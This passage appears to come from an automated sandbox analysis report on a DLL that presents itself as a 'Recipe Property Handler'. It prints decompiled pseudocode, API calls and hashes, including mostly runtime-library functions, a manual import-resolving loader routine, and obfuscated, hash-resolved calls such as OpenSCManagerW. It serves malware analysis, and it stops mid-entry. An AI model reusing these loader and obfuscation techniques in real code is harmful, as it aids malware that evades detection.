0x1000b3f7
0x1000b3c9
0x1000b3cb
0x1000b3cb
0x1000b3d8
0x1000b3de
0x1000b3e2
0x1000b442
0x1000b442
0x1000b3e4
0x1000b3ea
0x1000b42c
0x1000b440
0x00000000
0x1000b3ec
0x1000b3f5
0x1000b414
0x1000b428
0x1000b40e
0x1000b40e
0x00000000
0x00000000
0x00000000
0x1000b3f5
0x1000b3ea
0x00000000
0x1000b410
0x1000b3fd
0x1000b408
0x00000000
0x1000b3b7
0x1000b3ba
0x1000b3c0
0x1000b3c0
0x1000b411
0x1000b413
0x1000b3a4
0x1000b3ae
0x1000b3ae

APIs

_malloc.LIBCMT ref: 1000B3A7

Part of subcall function 10008E67: __FF_MSGBANNER.LIBCMT ref: 10008E7E
Part of subcall function 10008E67: __NMSG_WRITE.LIBCMT ref: 10008E85
Part of subcall function 10008E67: HeapAlloc.KERNEL32(00680000,00000000,00000001,00000000,?,00000000,?,10007F7D,1000E4A0,1000E4A0,1000E4A0,?,?,10009274,00000018,10010E08), ref: 10008EAA

_free.LIBCMT ref: 1000B3BA

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocHeap_free_malloc
String ID:
API String ID: 2734353464-0
Opcode ID: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction ID: 18c43e679c10c76ba13cd9b028f176d48a0d2f42c637b465b0a36ca5614664b7
Opcode Fuzzy Hash: 1470ddf5c31cb35418e52f366651dade25ef90282a91678f077e8ad7c8708cdc
Instruction Fuzzy Hash: AD11E031404616AFFB24EF74DC4564F3BD4DF042E1F218425F9489A15ADB31DE409750

Uniqueness

Uniqueness Score: -1.00%

Function 1000883C, Relevance: 7.5, APIs: 5, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E1000883C(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				LONG* _t20;
				signed int _t25;
				void* _t29;
				void* _t31;
				LONG* _t33;
				void* _t34;

				_t29 = __edx;
				_t24 = __ebx;
				_push(0xc);
				_push(0x10010da8);
				E10008040(__ebx, __edi, __esi);
				_t31 = E10006087();
				_t25 =  *0x10012ae4; // 0xfffffffe
				if(( *(_t31 + 0x70) & _t25) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
					E100091AB(0xd);
					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
					_t33 =  *(_t31 + 0x68);
					 *(_t34 - 0x1c) = _t33;
					__eflags = _t33 -  *0x10012394; // 0x10012690
					if(__eflags != 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							__eflags = InterlockedDecrement(_t33);
							if(__eflags == 0) {
								__eflags = _t33 - 0x10012690;
								if(__eflags != 0) {
									E10004732(_t33);
								}
							}
						}
						_t20 =  *0x10012394; // 0x10012690
						 *(_t31 + 0x68) = _t20;
						_t33 =  *0x10012394; // 0x10012690
						 *(_t34 - 0x1c) = _t33;
						InterlockedIncrement(_t33);
					}
					 *(_t34 - 4) = 0xfffffffe;
					E100088D8();
				} else {
					_t33 =  *(_t31 + 0x68);
				}
				_t38 = _t33;
				if(_t33 == 0) {
					E1000743E(_t24, _t29, _t31, _t33, _t38, 0x20);
				}
				return E10008085(_t33);
			}

0x1000883c
0x1000883c
0x1000883c
0x1000883e
0x10008843
0x1000884d
0x1000884f
0x10008858
0x10008879
0x1000887f
0x10008883
0x10008886
0x10008889
0x1000888f
0x10008891
0x10008893
0x1000889c
0x1000889e
0x100088a0
0x100088a6
0x100088a9
0x100088ae
0x100088a6
0x1000889e
0x100088af
0x100088b4
0x100088b7
0x100088bd
0x100088c1
0x100088c1
0x100088c7
0x100088ce
0x10008860
0x10008860
0x10008860
0x10008863
0x10008865
0x10008869
0x1000886e
0x10008876

APIs

Part of subcall function 10006087: __getptd_noexit.LIBCMT ref: 10006088
Part of subcall function 10006087: __amsg_exit.LIBCMT ref: 10006095

__amsg_exit.LIBCMT ref: 10008869
__lock.LIBCMT ref: 10008879
InterlockedDecrement.KERNEL32(?), ref: 10008896
_free.LIBCMT ref: 100088A9
InterlockedIncrement.KERNEL32(10012690), ref: 100088C1

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock_free
String ID:
API String ID: 1231874560-0
Opcode ID: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction ID: 6fa5c55f02b032b9b52f9637cbc65706c3d9556ef65a5339b15ab8c9acf7f00e
Opcode Fuzzy Hash: 30cc922b94fd66d93e4772b0e45363f14a3d134312cd16711b26b484a5aab7eb
Instruction Fuzzy Hash: 7901C075A016219BFB44EB64888578E77A0FF047D4F51800AE9886768CCF38AB91CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 10001470, Relevance: 6.4, APIs: 5, Instructions: 143
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E10001470(void* __ecx, intOrPtr* _a4) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _t44;
				signed short _t56;
				signed int _t58;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				void* _t67;
				intOrPtr* _t68;
				intOrPtr _t70;
				void _t71;
				signed short* _t72;
				intOrPtr _t73;
				intOrPtr _t77;
				intOrPtr* _t78;
				intOrPtr _t79;
				intOrPtr _t80;
				signed short* _t82;
				void* _t84;
				void* _t85;

				_t78 = _a4;
				_t65 =  *_t78;
				_t2 = _t78 + 4; // 0x4d8d5010
				_t79 =  *_t2;
				_a4 = _t79;
				if( *((intOrPtr*)(_t65 + 0x84)) == 0) {
					L22:
					return 1;
				} else {
					_t67 =  *((intOrPtr*)(_t65 + 0x80)) + _t79;
					_v12 = _t67;
					if(IsBadReadPtr(_t67, 0x14) == 0) {
						while(1) {
							_t44 =  *((intOrPtr*)(_t67 + 0xc));
							if(_t44 == 0) {
								goto L22;
							}
							_t8 = _t78 + 0x28; // 0x12f7805
							_t9 = _t78 + 0x1c; // 0xe58b0000
							_t80 =  *((intOrPtr*)( *_t9))(_t44 + _t79,  *_t8);
							_t85 = _t84 + 8;
							_v8 = _t80;
							if(_t80 == 0) {
								SetLastError(0x7e);
								return 0;
							} else {
								_t11 = _t78 + 0xc; // 0xd0ff0000
								_t14 = _t78 + 8; // 0x637e8ef
								_t70 = E10001DD0( *_t14, 4 +  *_t11 * 4);
								_t84 = _t85 + 8;
								if(_t70 == 0) {
									_t40 = _t78 + 0x28; // 0x12f7805
									_t41 = _t78 + 0x24; // 0x39c033cc
									 *((intOrPtr*)( *_t41))(_t80,  *_t40);
									SetLastError(0xe);
									return 0;
								} else {
									_t15 = _t78 + 0xc; // 0xd0ff0000
									 *((intOrPtr*)(_t78 + 8)) = _t70;
									_t77 = _t80;
									 *((intOrPtr*)(_t70 +  *_t15 * 4)) = _t77;
									 *(_t78 + 0xc) =  *(_t78 + 0xc) + 1;
									_t71 =  *_t67;
									if(_t71 == 0) {
										_t82 =  *((intOrPtr*)(_t67 + 0x10)) + _a4;
										_t72 = _t82;
									} else {
										_t64 = _a4;
										_t82 = _t71 + _t64;
										_t72 =  *((intOrPtr*)(_t67 + 0x10)) + _t64;
									}
									_t56 =  *_t82;
									if(_t56 == 0) {
										L17:
										_t67 = _t67 + 0x14;
										_v12 = _t67;
										if(IsBadReadPtr(_t67, 0x14) != 0) {
											goto L22;
										} else {
											_t79 = _a4;
											continue;
										}
									} else {
										_t73 = _t72 - _t82;
										_v16 = _t73;
										while(1) {
											_t27 = _t78 + 0x28; // 0x12f7805
											_push( *_t27);
											_t68 = _t73 + _t82;
											if(_t56 >= 0) {
												_t58 = _t56 + _a4 + 2;
											} else {
												_t58 = _t56 & 0x0000ffff;
											}
											_t30 = _t78 + 0x20; // 0xccccc35d
											_t60 =  *((intOrPtr*)( *_t30))(_t77, _t58);
											_t84 = _t84 + 0xc;
											 *_t68 = _t60;
											if(_t60 == 0) {
												break;
											}
											_t56 = _t82[2];
											_t73 = _v16;
											_t77 = _v8;
											_t82 =  &(_t82[2]);
											if(_t56 != 0) {
												continue;
											} else {
												_t67 = _v12;
												goto L17;
											}
											goto L23;
										}
										_t37 = _t78 + 0x28; // 0x12f7805
										_t39 = _t78 + 0x24; // 0x39c033cc
										 *((intOrPtr*)( *_t39))(_v8,  *_t37);
										SetLastError(0x7f);
										return 0;
									}
								}
							}
							goto L23;
						}
					}
					goto L22;
				}
				L23:
			}

0x10001479
0x1000147c
0x1000147e
0x1000147e
0x10001488
0x1000148b
0x100015db
0x100015e4
0x10001491
0x10001497
0x1000149c
0x100014a7
0x100014b0
0x100014b0
0x100014b5
0x00000000
0x00000000
0x100014bb
0x100014c1
0x100014c6
0x100014c8
0x100014cb
0x100014d0
0x100015c8
0x100015d6
0x100014d6
0x100014d6
0x100014e1
0x100014e9
0x100014eb
0x100014f0
0x100015a7
0x100015aa
0x100015ae
0x100015b5
0x100015c3
0x100014f6
0x100014f6
0x100014f9
0x100014fc
0x100014fe
0x10001501
0x10001504
0x10001508
0x1000151a
0x1000151d
0x1000150a
0x1000150a
0x1000150d
0x10001513
0x10001513
0x1000151f
0x10001523
0x1000156a
0x1000156a
0x10001570
0x1000157b
0x00000000
0x1000157d
0x1000157d
0x00000000
0x1000157d
0x10001525
0x10001525
0x10001527
0x10001530
0x10001530
0x10001530
0x10001533
0x10001538
0x10001545
0x1000153a
0x1000153a
0x1000153a
0x10001548
0x1000154c
0x1000154e
0x10001551
0x10001555
0x00000000
0x00000000
0x10001557
0x1000155a
0x1000155d
0x10001560
0x10001565
0x00000000
0x10001567
0x10001567
0x00000000
0x10001567
0x00000000
0x10001565
0x10001585
0x1000158b
0x1000158f
0x10001596
0x100015a4
0x100015a4
0x10001523
0x100014f0
0x00000000
0x100014d0
0x100014b0
0x00000000
0x100014a7
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,00000014,00000000,00000000,00000000,100013CB), ref: 1000149F
SetLastError.KERNEL32(0000007E,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100015C8

Part of subcall function 10001DD0: VirtualQuery.KERNEL32(0637E8EF,?,0000001C,100013CB,00000000,?,?,?,?,?,100014E9,0637E8EF,D0FF0000), ref: 10001DEA

IsBadReadPtr.KERNEL32(?,00000014,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB,10001E80), ref: 10001573
SetLastError.KERNEL32(0000007F), ref: 10001596
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,?,?,?,10001B1F,00000000,100013CB), ref: 100015B5

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast$Read$QueryVirtual
String ID:
API String ID: 4108280708-0
Opcode ID: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction ID: a489c81f2b48b45f7abe8d82c2fa530717afe034d23ef7191f16fae001b152d3
Opcode Fuzzy Hash: bf404f711d3082d50f5bbd0f7f711224f62efa474e87bb40448eead53f7fc99f
Instruction Fuzzy Hash: 02415E71600619EBEB10CF59DC80B99B7A8FF483A5F04416AED0ADB705D731E961CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 1000A35A, Relevance: 6.1, APIs: 4, Instructions: 96
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E1000A35A(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				int _t35;
				int _t38;
				int _t42;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t59;
				char* _t62;

				_t62 = _a8;
				if(_t62 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t62 != 0) {
					E1000476A( &_v20, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E1000A179( *_t62 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t59 = 1;
							_t42 = MultiByteToWideChar( *(_v20 + 4), 9, _t62, 1, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t42;
							if(_t42 != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t59;
							}
							L20:
							_t44 = E10005EC6();
							_t59 = _t59 | 0xffffffff;
							__eflags = _t59;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t59 = _v20;
						__eflags =  *(_t59 + 0x74) - 1;
						if( *(_t59 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t59 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t62[1];
							if(_t62[1] == 0) {
								goto L20;
							}
							L18:
							_t59 =  *(_t59 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t59 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t59 + 4), 9, _t62,  *(_t59 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t59 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t62 & 0x000000ff;
					}
					_t59 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x1000a362
0x1000a367
0x1000a381
0x00000000
0x1000a381
0x1000a369
0x1000a36e
0x00000000
0x00000000
0x1000a373
0x1000a38e
0x1000a393
0x1000a396
0x1000a39d
0x1000a3bc
0x1000a3c3
0x1000a3c5
0x1000a409
0x1000a411
0x1000a420
0x1000a426
0x1000a428
0x1000a438
0x1000a438
0x1000a43c
0x1000a43e
0x1000a441
0x1000a441
0x1000a441
0x1000a441
0x00000000
0x1000a447
0x1000a42a
0x1000a42a
0x1000a42f
0x1000a42f
0x1000a432
0x00000000
0x1000a432
0x1000a3c7
0x1000a3ca
0x1000a3ce
0x1000a3f7
0x1000a3f7
0x1000a3fa
0x1000a3fa
0x00000000
0x00000000
0x1000a3fc
0x1000a400
0x00000000
0x00000000
0x1000a402
0x1000a402
0x00000000
0x1000a402
0x1000a3d0
0x1000a3d3
0x00000000
0x00000000
0x1000a3d7
0x1000a3ea
0x1000a3f0
0x1000a3f3
0x1000a3f5
0x00000000
0x00000000
0x00000000
0x1000a3f5
0x1000a39f
0x1000a3a2
0x1000a3a4
0x1000a3a9
0x1000a3a9
0x1000a3ae
0x00000000
0x1000a3ae
0x1000a375
0x1000a37a
0x1000a37e
0x1000a37e
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 1000A38E
__isleadbyte_l.LIBCMT ref: 1000A3BC
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A3EA
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,100020F6,00000000,?,100020F6,?,?,?), ref: 1000A420

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction ID: 9d1cf0849eee1a075b18554553a91368e22c05569ceb8c6a927f46b954fbfb1a
Opcode Fuzzy Hash: d9634a8e026aa07a820c9bcf7b7f3b6f286b4ef525d2eb9816761caa15114c1e
Instruction Fuzzy Hash: 6231B035A00256AFEB11CF65C848BAE7BE5FF822D0F124628F850871A4E770E9D1DB90

Uniqueness

Uniqueness Score: -1.00%

Function 10006610, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 20%

			E10006610(void* __ebx, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __ebp;
				void* _t25;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_t30 = __esi;
				_t27 = __ebx;
				_t35 = _a28;
				_t29 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t29);
					_push(_a4);
					E10006C38(__ebx, _t29, __esi, _t35);
					_t33 = _t33 + 0x10;
				}
				_t36 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t29);
				}
				E100042B0(_t28);
				_push(_t30);
				_t31 = _a32;
				_push( *_t31);
				_push(_a20);
				_push(_a16);
				_push(_t29);
				E10006E99(_t27, _t31, _t36);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t29 + 8)) =  *((intOrPtr*)(_t31 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t29);
				_push(_a4);
				_t25 = E10006402(_t27, _t29, _t31, _t36);
				if(_t25 != 0) {
					E10004280(_t25, _t29);
					return _t25;
				}
				return _t25;
			}

0x10006610
0x10006610
0x10006613
0x10006618
0x1000661b
0x1000661d
0x10006620
0x10006623
0x10006624
0x10006627
0x1000662c
0x1000662c
0x1000662f
0x10006633
0x10006636
0x1000663b
0x10006638
0x10006638
0x10006638
0x1000663e
0x10006643
0x10006644
0x10006647
0x10006649
0x1000664c
0x1000664f
0x10006650
0x10006658
0x1000665d
0x10006661
0x10006667
0x1000666a
0x1000666d
0x10006670
0x10006671
0x10006674
0x1000667f
0x10006683
0x00000000
0x10006683
0x1000668a

APIs

___BuildCatchObject.LIBCMT ref: 10006627

Part of subcall function 10006C38: ___AdjustPointer.LIBCMT ref: 10006C81

_UnwindNestedFrames.LIBCMT ref: 1000663E
___FrameUnwindToState.LIBCMT ref: 10006650
CallCatchBlock.LIBCMT ref: 10006674

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID:
API String ID: 2633735394-0
Opcode ID: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction ID: 929118807ddd2d015550d77d84a67e82c7ccc00f3a1cd5c495e14181e13c7b39
Opcode Fuzzy Hash: 38cfbb4d2267087fb04e53c3657a99f3c08a1c5c1ee859ea4b28d79f0814a6ce
Instruction Fuzzy Hash: D6014C72000109BBEF02CF55DC01EDA3BBAFF5C790F228119F91862124C732E961DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100032A0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMON

Download Yara Rule

APIs

StringFromGUID2.OLE32(?,?,00000027), ref: 100032CF
GetModuleFileNameW.KERNEL32(10000000,?,00000104,?,10002572,1000D260,80000002,B015C968), ref: 100032E3

Strings

Recipe (.recipe) Property Handler, xrefs: 100032A6

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: FileFromModuleNameString
String ID: Recipe (.recipe) Property Handler
API String ID: 1402647516-129706424
Opcode ID: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction ID: 6f8015bcf9db97dc62130dd9dbc2d8b03967e6a2f427fd85d2ca8f80d55362ab
Opcode Fuzzy Hash: 7ed536aff0d5137a22396f0237d134f3e1b2848668901a19bc3cda47405f2b17
Instruction Fuzzy Hash: 7AF01231510718AFD310DFA8C844E96B7E8EF09754F00851BF689D7610E7B0A544CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10001980, Relevance: 5.1, APIs: 4, Instructions: 57
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E10001980(void* _a4) {
				void* _t15;
				void* _t16;
				void* _t20;
				intOrPtr _t23;
				void* _t30;
				signed int _t32;
				void* _t34;
				void* _t35;

				_t34 = _a4;
				if(_t34 == 0) {
					return _t15;
				}
				if( *((intOrPtr*)(_t34 + 0x10)) != 0) {
					_t30 =  *(_t34 + 4);
					 *((intOrPtr*)( *((intOrPtr*)( *_t34 + 0x28)) + _t30))(_t30, 0, 0);
				}
				if( *(_t34 + 8) == 0) {
					L10:
					_t16 =  *(_t34 + 4);
					if(_t16 != 0) {
						VirtualFree(_t16, 0, 0x8000);
					}
					return HeapFree(GetProcessHeap(), 0, _t34);
				} else {
					_t32 = 0;
					if( *((intOrPtr*)(_t34 + 0xc)) <= 0) {
						L8:
						_t20 =  *(_t34 + 8);
						if(_t20 != 0) {
							VirtualFree(_t20, 0, 0x8000);
						}
						goto L10;
					} else {
						goto L5;
					}
					do {
						L5:
						_t23 =  *((intOrPtr*)( *(_t34 + 8) + _t32 * 4));
						if(_t23 != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_t34 + 0x24))))(_t23,  *((intOrPtr*)(_t34 + 0x28)));
							_t35 = _t35 + 8;
						}
						_t32 = _t32 + 1;
					} while (_t32 <  *((intOrPtr*)(_t34 + 0xc)));
					goto L8;
				}
			}

0x10001984
0x10001989
0x10001a09
0x10001a09
0x1000198f
0x10001993
0x100019a0
0x100019a0
0x100019a6
0x100019e2
0x100019e2
0x100019e7
0x100019f1
0x100019f1
0x00000000
0x100019a8
0x100019a9
0x100019ae
0x100019cc
0x100019cc
0x100019d2
0x100019dc
0x100019dc
0x00000000
0x00000000
0x00000000
0x00000000
0x100019b0
0x100019b0
0x100019b3
0x100019b8
0x100019c1
0x100019c3
0x100019c3
0x100019c6
0x100019c7
0x00000000
0x100019b0

APIs

VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019DC
VirtualFree.KERNEL32(?,00000000,00008000,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50), ref: 100019F1
GetProcessHeap.KERNEL32(00000000,EC8B55CC,00000000,?,10001DC4,00000000,100013CB,EC8B55CC,?,10001B1F,00000000,100013CB,10001E80,10001E60,10001E50,00000000), ref: 100019FA
HeapFree.KERNEL32(00000000,?,10001DC4), ref: 10001A01

Memory Dump Source

Source File: 00000007.00000002.2107182626.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2107150063.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107205088.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2107220492.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2107230746.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$HeapVirtual$Process
String ID:
API String ID: 3505259878-0
Opcode ID: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction ID: 46a294df184e67868fe018602a73977999fd3160e39f49d8b46b80fbf7fdd7f8
Opcode Fuzzy Hash: f0dbf08bf0ac1d416156738cb98c565ad35b7fd76a7272c1614ca254b19f3500
Instruction Fuzzy Hash: 1E115A31600711ABE620DBA5CC89F9673E8EB48BD1F108818F59AD7294CB70F841CBA0

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: rundll32.exe PID: 2836 Parent PID: 960 rundll32.exeCOMMON

Executed Functions

Function 001E2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001E2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E001E602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E001F07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x001e295f
0x001e2964
0x001e2967
0x001e296a
0x001e296d
0x001e296e
0x001e296f
0x001e2977
0x001e2985
0x001e298a
0x001e2992
0x001e299a
0x001e29a2
0x001e29a9
0x001e29b0
0x001e29b7
0x001e29bb
0x001e29cf
0x001e29dc
0x001e29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 001E29DC

Strings

<^, xrefs: 001E2977

Memory Dump Source

Source File: 00000008.00000002.2102499691.00000000001E1000.00000020.00000001.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000008.00000002.2102493162.00000000001E0000.00000004.00000001.sdmp Download File
Associated: 00000008.00000002.2102521083.00000000001FC000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: f29e54dee73b85a96df9d17acf58ceeec97b552066db9f924e08f68ae3473b75
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: 19018072A00108BFEB14DF95DC0A8DFBFB6EF48750F108088F508A6250D7B65F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 001EC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001EC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E001E602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E001F07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x001ec6e1
0x001ec6e6
0x001ec6f0
0x001ec6fc
0x001ec703
0x001ec706
0x001ec70d
0x001ec711
0x001ec715
0x001ec71c
0x001ec723
0x001ec72a
0x001ec731
0x001ec738
0x001ec751
0x001ec762
0x001ec768

APIs

